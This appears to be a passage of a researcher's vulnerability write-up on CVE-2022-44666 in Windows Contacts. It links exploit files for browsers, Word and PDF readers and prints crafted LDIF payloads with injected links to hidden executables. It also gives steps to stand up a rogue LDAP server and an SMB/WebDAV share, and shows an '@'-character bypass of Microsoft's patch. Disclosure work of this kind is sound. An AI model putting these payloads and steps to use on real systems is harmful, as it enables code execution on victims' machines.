src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9gtm51lzb0uo380gygvq4.gif\" \/><\/p><ul><li><p>6.5. PoC for PDF Readers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/pdfreaders-poc.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/pdfreaders-poc.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9h8491lww0uqobxda3kjm.gif\" \/><\/p><ul><li><p>6.6. 
Exploit for PDF Readers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/pdfreaders-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/pdfreaders-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9hnru1m000uo36uo3cept.gif\" \/><\/p><\/li><\/ol><p>Additionally, these are all the files for further exploitation:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/KB5014666-hotfix.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/KB5014666-hotfix.vcf<\/a>: Simple payload which executes local binaries.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/poc.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/poc.html<\/a>: HTML file to download KB5014666-hotfix.vcf.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/remote-weaponized-by-searchms\/exploit.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/remote-weaponized-by-searchms\/exploit.html<\/a>: HTML file to trigger &#8220;search-ms&#8221; in a remote shared location.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.vcf<\/a>: Simple payload which executes local binaries.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/poc.docx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/poc.docx<\/a>: Word file in format DOCX which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a 
href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/poc.rtf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/poc.rtf<\/a>: Word file in format RTF which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/poc.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/poc.html<\/a>: remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/exploit.docx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/exploit.docx<\/a>: Word file in format DOCX which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/exploit.rtf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/exploit.rtf<\/a>: Word file in format RTF which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/poc.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/remote-weaponized-by-searchms\/poc.html<\/a>: Remote template aka htmlfile activex which triggers &#8220;search-ms&#8221; in a remote shared location.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/poc\/KB5014666-hotfix.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/poc\/KB5014666-hotfix.vcf<\/a>: Simple payload which executes local binaries.<\/p><\/li><li><p><a 
href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/poc\/poc-vcf.pdf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/poc\/poc-vcf.pdf<\/a>: PDF file which triggers the default browser to download and execute KB5014666-hotfix.vcf.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/remote-weaponized-by-searchms\/exploit.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/remote-weaponized-by-searchms\/exploit.html<\/a>: HTML file which triggers &#8220;search-ms&#8221; in a remote shared location, to be used by PDF readers.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/remote-weaponized-by-searchms\/exploit.pdf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/remote-weaponized-by-searchms\/exploit.pdf<\/a>: PDF which triggers the default browser to execute the URI protocol &#8220;search-ms&#8221;.<\/p><\/li><\/ul><h2>Contact Files<\/h2><p>After receiving the <strong><em>Update 2022\/07\/21<\/em><\/strong> reply from MSRC, I decided to take a look into the Contact file extension, as it would confirm whether or not it&#8217;s the same case as the one found by the original discoverer, and of course it is. My first proof of concept was just using a different file format, but the bug is the same. Just using wabmig.exe, located in &#8220;C:\\Program Files\\Windows Mail&#8221;, it&#8217;s possible to convert all the VCF files to Contact files.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9i5hl1lxg0uqo0fzx3cym.png\" \/><\/p><p>And as mentioned in the intro updates, these files are opened by Windows Contacts (the default program).<\/p><p>The steps to reproduce are the same as those used for VCF files. 
The same restrictions observed for VCF files apply to Contact files, that is, it&#8217;s not possible to use remote shared locations for the attribute &#8220;href&#8221;, but it&#8217;s still possible to use local paths or the URL protocol &#8220;search-ms&#8221;.<\/p><p>These are all the files added or modified to exploit Contact files:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/KB5014666-hotfix.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/KB5014666-hotfix.vcf<\/a>: Simple payload which executes local binaries using VCF format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/KB5014666-hotfix.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/KB5014666-hotfix.contact<\/a>: Simple payload which executes local binaries using Contact format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/poc-vcf.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/poc-vcf.html<\/a>: HTML file to download KB5014666-hotfix.vcf.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/poc\/poc-contact.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/poc\/poc-contact.html<\/a>: HTML file to download KB5014666-hotfix.contact.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.vcf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.vcf<\/a>: Simple payload which executes local binaries using VCF format.<\/p><\/li><li><p><a 
href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/poc\/KB5014666-hotfix.contact<\/a>: Simple payload which executes local binaries using Contact format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/poc\/KKB5014666-hotfix.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/poc\/KB5014666-hotfix.contact<\/a>: Simple payload which executes local binaries using Contact format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/poc\/poc-contact.pdf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/poc\/poc-contact.pdf<\/a>: PDF file to download KB5014666-hotfix.contact.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/to-copy-in-remote-shared-location\/KB5001337-hotfix.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/to-copy-in-remote-shared-location\/KB5001337-hotfix.contact<\/a>: Payload which executes binaries via &#8220;search-ms&#8221; in a remote shared location using Contact format.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/report-pocs\/exploit.contact\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/report-pocs\/exploit.contact<\/a>: Same file as exploit.VCF, in Contact file format.<\/p><\/li><\/ul><h2>URL protocol LDAP<\/h2><p>As mentioned above, this further research made me reach a point I had been trying to reach for some time: use some URL protocol handler to automatically open crafted contact data to exploit the bug. 
This challenge was finally achieved thanks to the ldap URI scheme.<\/p><pre><code>...\nWindows Registry Editor Version 5.00\n\n[HKEY_CLASSES_ROOT\\LDAP]\n@=\"URL:LDAP Protocol\"\n\"EditFlags\"=hex:02,00,00,00\n\"URL Protocol\"=\"\"\n\n[HKEY_CLASSES_ROOT\\LDAP\\Clsid]\n@=\"{228D9A81-C302-11cf-9AA4-00AA004A5691}\"\n\n[HKEY_CLASSES_ROOT\\LDAP\\shell]\n\n[HKEY_CLASSES_ROOT\\LDAP\\shell\\open]\n\n[HKEY_CLASSES_ROOT\\LDAP\\shell\\open\\command]\n@=hex(2):22,00,25,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,46,00,69,00,6c,\\\n  00,65,00,73,00,25,00,5c,00,57,00,69,00,6e,00,64,00,6f,00,77,00,73,00,20,00,\\\n  4d,00,61,00,69,00,6c,00,5c,00,77,00,61,00,62,00,2e,00,65,00,78,00,65,00,22,\\\n  00,20,00,22,00,2f,00,6c,00,64,00,61,00,70,00,3a,00,25,00,31,00,22,00,00,00\n...<\/code><\/pre><p>That is, the REG_EXPAND_SZ value decodes to:<\/p><pre><code>\"%ProgramFiles%\\Windows Mail\\wab.exe\" \"\/ldap:%1\"\n<\/code><\/pre><p>So by setting up a rogue LDAP server and serving the payload data, it&#8217;s possible to use this URL protocol handler to launch Windows Contacts (wab.exe) with a malicious payload in the LDIF attributes mail, url or wwwhomepage. 
Note that I was unable to get this working on the attribute &#8220;wwwhomepage&#8221; as indicated <a href=\"https:\/\/docs.bmc.com\/docs\/fpsc121\/ldap-attributes-and-associated-fields-495323340.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">here<\/a>, but it should theoretically work.<\/p><p>The crafted LDIF content is just something like this:<\/p><pre><code>...\ndn: dc=org\ndc: org\nobjectClass: dcObject\n\ndn: dc=example,dc=org\ndc: example\nobjectClass: dcObject\nobjectClass: organization\n\ndn: ou=people,dc=example,dc=org\nobjectClass: organizationalUnit\nou: people\n\ndn: cn=Microsoft,ou=people,dc=example,dc=org\ncn: Microsoft\ngn: Microsoft\ncompany: Microsoft\ntitle: Microsoft KB5001337-hotfix\nmail:\"&gt;&lt;\/a&gt;&lt;a href=\"..\\hidden\\payload.lnk\"&gt;Run-installer...&lt;\/a&gt;\nurl:\"&gt;&lt;\/a&gt;&lt;a href=\"..\\hidden\\payload.exe\"&gt;Run-installer...&lt;\/a&gt;\nwwwhomepage:\"&gt;&lt;\/a&gt;&lt;a href=\"notepad\"&gt;Run-installer...&lt;\/a&gt;\nobjectclass: top\nobjectclass: person\nobjectClass: inetOrgPerson\n...<\/code><\/pre><p>And the code for the rogue LDAP server was borrowed from the quick start server of the ldaptor project, located <a href=\"https:\/\/ldaptor.readthedocs.io\/en\/latest\/quickstart.html#ldap-server-quick-start\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">over here<\/a>.<\/p><p>This is a summary of target applications:<\/p><ul><li><p>Browsers: MS Edge, Google Chrome, Mozilla Firefox &amp; Opera.<\/p><\/li><li><p>MS Word.<\/p><\/li><li><p>PDF Readers (mainly Adobe Acrobat Reader DC &amp; Foxit PDF Reader).<\/p><\/li><\/ul><p>The steps to reproduce are:<\/p><ol><li><p>Copy <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs<\/a> into a remote shared location (SMB or WebDAV).<\/p><\/li><li><p>If wanted, hide the files by running <a 
href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/setup-hidden.bat\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/setup-hidden.bat<\/a>.<\/p><\/li><li><p>Install ldaptor by pip: pip install ldaptor. Note this has been tested on Python 2.7 x64.<\/p><\/li><li><p>Start rogue ldap server located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/ldap-rogue-server\/ldap-server.py\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/ldap-rogue-server\/ldap-server.py<\/a><\/p><\/li><li><p>Start a webserver in the target app path, that is: .\/further-pocs\/[vector or target app]\/url-protocol-ldap\/.<\/p><\/li><li><p>Run exploit files depending on the case.<\/p><\/li><li><p>For further info, watch the videos located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos<\/a><\/p><ul><li><p>7.1. For browsers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/ldap-browsers-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/ldap-browsers-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9iuze1lxq0uqo1lvkalir.gif\" \/><\/p><ul><li><p>7.2. For MS Word: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/ldap-msword-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/ldap-msword-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9j68n1m0n0uo3aoa3hiji.gif\" \/><\/p><ul><li><p>7.3. 
For PDF Readers: <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/videos\/ldap-pdfreaders-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/videos\/ldap-pdfreaders-exploit.gif<\/a>.<\/p><\/li><\/ul><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9jhrb1lxy0uqo4jg4hkm0.gif\" \/><\/p><\/li><\/ol><p>These are the additional files to exploit url protocol ldap:<\/p><ul><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/browsers\/url-protocol-ldap\/exploit.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/browsers\/url-protocol-ldap\/exploit.html<\/a>: HTML file to load url protocol ldap on a rogue ldap server which returns crafted data for mail and urls.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/url-protocol-ldap\/poc.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/url-protocol-ldap\/poc.html<\/a>: remote template aka htmlfile activex to load url protocol ldap on a rogue ldap server which returns crafted data for mail and urls.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/url-protocol-ldap\/exploit.rtf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/url-protocol-ldap\/exploit.rtf<\/a>: Word file in format RTF which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/MSWord\/url-protocol-ldap\/exploit.docx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/MSWord\/url-protocol-ldap\/exploit.docx<\/a>: Word file in format DOCX which triggers a remote template aka htmlfile activex.<\/p><\/li><li><p><a 
href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/url-protocol-ldap\/exploit.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/url-protocol-ldap\/exploit.html<\/a>: HTML file to load the URL protocol ldap against a rogue LDAP server which returns crafted data for mail and URLs.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/PDFreaders\/url-protocol-ldap\/exploit.pdf\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/PDFreaders\/url-protocol-ldap\/exploit.pdf<\/a>: PDF which triggers the default browser to execute the URI protocol &#8220;ldap&#8221;.<\/p><\/li><li><p><a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/further-pocs\/ldap-rogue-server\/ldap-server.py\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/further-pocs\/ldap-rogue-server\/ldap-server.py<\/a>: Python script based on the server sample for ldaptor, which runs on Python 2.7, and serves the crafted data to exploit the bug through the LDIF attributes mail, url and wwwhomepage.<\/p><\/li><\/ul><h2>CVE-2022-44666: Patch analysis and incomplete fix<\/h2><p>On Dec 13, 2022, the patch for this vulnerability was released by Microsoft as <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-44666\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">CVE-2022-44666<\/a>.<\/p><p>The versions used for diffing the patch (located in C:\\Program Files\\Common Files\\System\\wab32.dll) were:<\/p><ul><li><p>MD5: 588A3D68F89ABF1884BEB7267F274A8B (pre-patch)<\/p><\/li><li><p>MD5: D1708215AD2624E666AFD97D97720E81 (post-patch)<\/p><\/li><\/ul><p>Diffing the affected library (wab32.dll) with <a href=\"https:\/\/github.com\/joxeankoret\/diaphora\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Diaphora<\/a> by <a href=\"https:\/\/twitter.com\/matalaz\" target=\"_blank\" rel=\"noopener noreferrer 
nofollow\">@matalaz<\/a>, we find some new functions:<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9k2ms1m1a0uo3gnnn1u8z.png\" \/><\/p><p>And these are the partial matches:<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9k9d91lyr0uqogrwy3gck.png\" \/><\/p><p>Taking a look at the new code in the function &#8220;fnSummaryProc&#8221;:<\/p><pre><code>__int64 __fastcall fnSummaryProc(HWND a1, int a2, WPARAM a3, LONG_PTR a4)\n{\n\n...\n\n    if ( v26 &lt;= 0x824 &amp;&amp; (!v23 ? (v27 = 0) : (v27 = IsValidWebsiteUrlScheme(v23)), v27) )  \/\/ (1)\n    {\n      v38 = (unsigned __int16 *)2085;\n      v39 = &amp;CPercentEncodeRFC3986::`vftable';\n      v40 = v23;\n      v41 = v26;\n      v28 = CPercentEncodeString::Encode(\n              (CPercentEncodeString *)&amp;v39,\n              (unsigned __int16 *)&amp;Dst,\n              (unsigned __int64 *)&amp;v38,\n              v25);\n      v29 = v7;\n      if ( !v28 )\n      {\n        v30 = (const unsigned __int16 *)&amp;Dst;\nLABEL_44:\n        SafeExecute(v29, v24, v30);  \/\/ (2)\n        return 1i64;\n      }\n    }\n    else\n    {\n      if ( v23 )\n        v32 = IsInternetAddress(v23, &amp;v38);\n      else\n        v32 = 0;\n      v29 = v7;\n      if ( v32 )\n      {\n        v30 = v23;\n        goto LABEL_44; \/\/ (3)\n      }\n    }\n    v31 = GetParent(v29);\n    ShowMessageBox(v31, 0xFE1u, 0x30u); \/\/ (4)\n    return 1i64;\n  }\n  ...\n}<\/code><\/pre><p>After the fix, the new code either calls the function &#8220;SafeExecute&#8221; (2) or shows a message box (4).<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9ksk21m1v0uo3f5cw9smu.png\" \/><\/p><p>To reach the call to the function &#8220;SafeExecute&#8221; (2), one option is to follow the code flow through (1):<\/p><pre><code>_BOOL8 __fastcall IsValidWebsiteUrlScheme(LPCWSTR pszIn)\n{\n  const WCHAR *v1; \/\/ rbx\n  _BOOL8 result; \/\/ 
rax\n  DWORD pcchOut; \/\/ [rsp+30h] [rbp-68h]\n  char Dst; \/\/ [rsp+40h] [rbp-58h]\n\n  v1 = pszIn;\n  result = 0;\n  if ( UrlIsW(pszIn, URLIS_URL) ) \/\/ (5)\n  {\n    memset_0(&amp;Dst, 0, 0x40ui64);\n    pcchOut = 32;\n    if ( UrlGetPartW(v1, (LPWSTR)&amp;Dst, &amp;pcchOut, 1u, 0) &gt;= 0\n      &amp;&amp; (!(unsigned int)StrCmpICW(&amp;Dst, L\"http\") || !(unsigned int)StrCmpICW(&amp;Dst, L\"https\")) )  \/\/ (6)\n    {\n      result = 1;\n    }\n  }\n  return result;\n}<\/code><\/pre><p>This function first checks if the <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/shlwapi\/nf-shlwapi-urlisw\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">URL is valid in (5)<\/a>; then it extracts the scheme and checks whether or not it is &#8220;http&#8221; or &#8220;https&#8221; in (6). This code path looks safe enough. Coming back to the function &#8220;fnSummaryProc&#8221;, there&#8217;s another code path, (3), that can be used to bypass the fix.<\/p><pre><code>__int64 __fastcall IsInternetAddress(unsigned __int16 *a1, unsigned __int16 **a2)\n{\n  unsigned __int16 v2; \/\/ ax\n  unsigned __int16 **v3; \/\/ r14\n  unsigned __int16 *v4; \/\/ rdi\n  unsigned __int16 *v5; \/\/ r15\n  unsigned __int16 v6; \/\/ dx\n  unsigned __int16 *v7; \/\/ r8\n  unsigned __int16 *v8; \/\/ rcx\n  WCHAR v9; \/\/ ax\n  _WORD *v10; \/\/ rsi\n  int v11; \/\/ ebp\n  LPWSTR v12; \/\/ rax\n  unsigned __int16 *v14; \/\/ rax\n\n  v2 = *a1;\n  v3 = a2;\n  v4 = a1;\n  v5 = a1;\n  while ( v2 &amp;&amp; v2 != 0x3C )\n  {\n    a1 = CharNextW(a1);\n    v2 = *a1;\n  }\n  v6 = *a1;\n  v7 = a1;\n  if ( *a1 )\n  {\n    v8 = a1 + 1;\n    v4 = v8;\n  }\n  else\n  {\n    v8 = v4;\n  }\n  v9 = *v8;\n  v10 = (_WORD *)((unsigned __int64)v7 &amp; -(__int64)(v6 != 0));\n  v11 = v6 != 0;\n  if ( *v8 &amp; 0xFFBF )\n  {\n    while ( v9 &lt;= 0x7Fu &amp;&amp; v9 != 0xD &amp;&amp; v9 != 0xA )\n    {\n      if ( v9 == 0x40 )  \/\/ (7)\n      {\n        v14 = CharNextW(v8);\n        if ( !(unsigned int)IsDomainName(v14, v11, v3 != 0i64) )  \/\/ (8)\n          return 0i64;\n        if ( v3 )\n        {\n          if ( v10 )\n          {\n            *v10 = 0;\n            TrimSpaces(v5);\n          }\n          *v3 = v4;\n        }\n        return 1i64;\n      }\n      v12 = CharNextW(v8);\n      v8 = v12;\n      v9 = *v12;\n      if ( !v9 )\n        return 0i64;\n    }\n  }\n  return 0i64;\n}<\/code><\/pre><p>One thing caught my attention in (7), where the code checks whether a &#8220;@&#8221; char exists. It then calls the function &#8220;IsDomainName&#8221; in (8) to check whether or not the string after the &#8220;@&#8221; char is a domain name:<\/p><pre><code>__int64 __fastcall IsDomainName(unsigned __int16 *a1, int a2, int a3)\n{\n  int v3; \/\/ edi\n  int v4; \/\/ ebx\n  int v5; \/\/ er9\n  __int64 v6; \/\/ rdx\n\n  v3 = a3;\n  v4 = a2;\n  if ( !a1 )\n    return 0i64;\nLABEL_2:\n  v5 = *a1;\n  if ( !(_WORD)v5 || (_WORD)v5 == 0x2E || v4 &amp;&amp; (_WORD)v5 == 0x3E )\n    return 0i64;\n  while ( (_WORD)v5 &amp;&amp; (!v4 || (_WORD)v5 != 0x3E) )\n  {\n    if ( (unsigned __int16)v5 &gt;= 0x80u )\n      return 0i64;\n    if ( (unsigned __int16)(v5 - 10) &lt;= 0x36u )\n    {\n      v6 = 19140298416324617i64;\n      if ( _bittest64(&amp;v6, (unsigned int)(v5 - 10)) )\n        return 0i64;\n    }\n    if ( (_WORD)v5 == 46 )\n    {\n      a1 = CharNextW(a1);\n      if ( a1 )\n        goto LABEL_2;\n      return 0i64;\n    }\n    a1 = CharNextW(a1);\n    v5 = *a1;\n  }\n  if ( v4 )\n  {\n    if ( (_WORD)v5 != 0x3E )\n      return 0i64;\n    if ( v3 )\n      *a1 = 0;\n  }\n  return 1i64;\n}<\/code><\/pre><p>So the bypass for the fix is pretty simple: a single &#8220;@&#8221; char is all that is needed, because nothing on this path requires the string to be a mailto: address. 
Syslink href attributes like these will successfully bypass the fix:<\/p><pre><code>hidden\\@payload.lnk\nhidden\\@payload.exe<\/code><\/pre><pre><code>hidden@payload.lnk\nhidden@payload.exe<\/code><\/pre><p>For further info, there&#8217;s a video for a <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/videos\/simple-payload.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">standalone contact file<\/a>.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9lvjn1lzh0uqo6ls8hoxg.gif\" \/><\/p><p>Proof of concept located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/report-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/bypass\/report-pocs<\/a>.<\/p><p>And another one for <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/videos\/ldap-msword-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">MS Word and the LDAP URL protocol<\/a>.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9mcdv1lzo0uqocx279si1.gif\" \/><\/p><p>Proof of concept located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/further-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/bypass\/further-pocs<\/a>.<\/p><p>One day after the patch release, this information was sent to MSRC. 
Unfortunately, the case has recently been closed with no further info about it.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9mkzi1m2t0uo36pzr6ssb.png\" \/><\/p><h2>Diagcab file as payload<\/h2><p>After <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-30190\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">CVE-2022-30190<\/a>, also known as the <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Follina vulnerability<\/a>, and <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2022-34713\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">CVE-2022-34713<\/a>, also known as the <a href=\"https:\/\/www.bleepingcomputer.com\/news\/microsoft\/microsoft-patches-windows-dogwalk-zero-day-exploited-in-attacks\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">DogWalk vulnerability<\/a>, a <a href=\"https:\/\/twitter.com\/buffaloverflow\/status\/1534445288332701697\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">publicly known but underrated technique<\/a> was revived thanks to <a href=\"https:\/\/twitter.com\/buffaloverflow\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@buffaloverflow<\/a>. My mate and friend <a href=\"https:\/\/twitter.com\/edu_braun_0day\" target=\"_blank\" 